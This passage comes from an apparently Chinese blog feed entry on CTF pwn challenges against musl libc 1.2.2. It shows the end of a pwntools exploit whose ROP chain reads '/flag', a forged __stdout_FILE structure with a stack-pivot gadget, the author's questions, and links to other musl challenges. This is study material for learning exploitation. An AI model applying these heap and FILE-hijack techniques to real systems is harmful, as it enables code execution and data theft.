class="line"></span><br><span class="line">buf = mmap_base + <span class="number">0x2aa0</span></span><br><span class="line">leak(<span class="string">'buf'</span>,buf)</span><br><span class="line">rop_chain = mmap_base + <span class="number">0x2ba0</span></span><br><span class="line">leak(<span class="string">'rop_chain'</span>,rop_chain)</span><br><span class="line"></span><br><span class="line">pop_rdi = libc.address + <span class="number">0x15536</span></span><br><span class="line">pop_rsi = libc.address + <span class="number">0x1b3a9</span></span><br><span class="line">pop_rdx = libc.address + <span class="number">0x4727c</span></span><br><span class="line">xchg_eax_edi = libc.address + <span class="number">0x26e75</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">open</span> = libc.symbols[<span class="string">"open"</span>]</span><br><span class="line">read = libc.symbols[<span class="string">"read"</span>]</span><br><span class="line">write = libc.symbols[<span class="string">"write"</span>]</span><br><span class="line"></span><br><span class="line">rop = flat([</span><br><span class="line"> pop_rdi, buf,</span><br><span class="line"> pop_rsi, <span class="number">0</span>,</span><br><span class="line"> <span class="built_in">open</span>, <span class="comment"># open("/flag", 0)</span></span><br><span class="line"> xchg_eax_edi, <span class="comment">#xchg edi,eax; ret</span></span><br><span class="line"> pop_rsi, buf,</span><br><span class="line"> pop_rdx, <span class="number">0x100</span>,</span><br><span class="line"> read, <span class="comment"># read(fd, buf, 0x100)</span></span><br><span class="line"> pop_rdi, <span class="number">1</span>,</span><br><span class="line"> pop_rsi, buf,</span><br><span class="line"> pop_rdx, <span class="number">0x100</span>,</span><br><span class="line"> write, <span class="comment"># write(1, buf, 0x100)</span></span><br><span class="line">])</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x1000</span>, <span class="string">b"/flag"</span>.ljust(<span class="number">0x100</span>, <span class="string">'\x00'</span>) + rop)</span><br><span class="line"></span><br><span class="line"><span class="comment"># =============================================================================</span></span><br><span class="line"><span class="comment">### Build fake __stdout_FILE</span></span><br><span class="line"><span class="comment"># 0x15238: ret; </span></span><br><span class="line">ret = libc.address + <span class="number">0x15238</span></span><br><span class="line"><span class="comment"># 0x4bcf3: mov rsp, qword ptr [rdi + 0x30]; jmp qword ptr [rdi + 0x38]; </span></span><br><span class="line">stack_mig = libc.address + <span class="number">0x4bcf3</span></span><br><span class="line"></span><br><span class="line">stdout = flat({</span><br><span class="line"> <span class="number">0x20</span>: <span class="number">1</span>, <span class="comment"># f->wpos</span></span><br><span class="line"> <span class="number">0x28</span>: <span class="number">1</span>, <span class="comment"># f->wend</span></span><br><span class="line"> <span class="number">0x30</span>: rop_chain, </span><br><span class="line"> <span class="number">0x38</span>: ret, </span><br><span class="line"> <span class="number">0x48</span>: stack_mig <span class="comment"># f->write</span></span><br><span class="line">},filler=<span class="string">'V'</span>)</span><br><span class="line"><span class="built_in">print</span> stdout</span><br><span class="line"><span class="comment">### Overwrite __stdout_FILE</span></span><br><span class="line">add(<span class="number">0x800</span>, stdout)</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br></pre></td></tr></table></figure><h3 id="疑问"><a href="#疑问" class="headerlink" title="疑问"></a><strong>疑问</strong></h3><p>为什么add 0x800大小的chunk就可以直接申请到stdout_FILE,而不是从被释放的0x1000chunk开头开始(stdout_FILE - 0x940)?</p><p>为什么content_chunk5(0x1000)一开始要在0x238偏移后写入p32(5),大概是绕过free时的检查?毕竟把它head头的offset从0x1550改成了1000</p><hr><p>强网杯 2021 easyheap</p><p><a href="https://cy2cs.top/2021/06/16/%E3%80%90ctf%E3%80%91%E5%BC%BA%E7%BD%91%E6%9D%AF-2021-easyheap/">https://cy2cs.top/2021/06/16/%E3%80%90ctf%E3%80%91%E5%BC%BA%E7%BD%91%E6%9D%AF-2021-easyheap/</a></p><p>DefCon_Quals_2021_mooosl</p><p><a href="https://www.anquanke.com/post/id/241104#h2-0">https://www.anquanke.com/post/id/241104#h2-0</a></p><p>RCTF_2021_musl</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$./libc.so </span><br><span class="line">musl libc (x86_64)</span><br><span class="line">Version 1.2.2</span><br><span class="line">Dynamic Program Loader</span><br></pre></td></tr></table></figure><p>静态分析</p><p>禁用了execve</p><p>只能在add写chunk</p><p>idx<=15</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">manage_chunk</span>{</span> # <span class="number">0xc</span>(<span class="number">8</span>+<span class="number">4</span>)复用<span class="number">4</span>字节空间</span><br><span class="line"><span class="keyword">void</span> *content_chunk_ptr; </span><br><span class="line"> <span class="number">0</span>;</span><br><span class="line"><span class="keyword">size_t</span> size - <span class="number">1</span>;</span><br><span class="line">};</span><br></pre></td></tr></table></figure><p>free content_chunk</p><p>free manage_chunk</p><p>任意次数show</p><p>BSides Noida CTF baby_musl</p><p>musl_pwn之exit函数劫持</p>]]></content>
<summary type="html"><blockquote>
<p>准备复现5道musl pwn,其中4道都是1.2.2版本的,源码实在看不下去呜呜呜,还是跟之前学glibc一样,直接去gdb看数据来理解结构和内存管理。musl里没有malloc_hook和free_hook,所以保护全开的时候通常只能打FILE结构体。先从类似glibc的1.1.24版本入手。</p>
</blockquote></summary>
<category term="pwn" scheme="https://brooke-hub.github.io/tags/pwn/"/>
</entry>
</feed>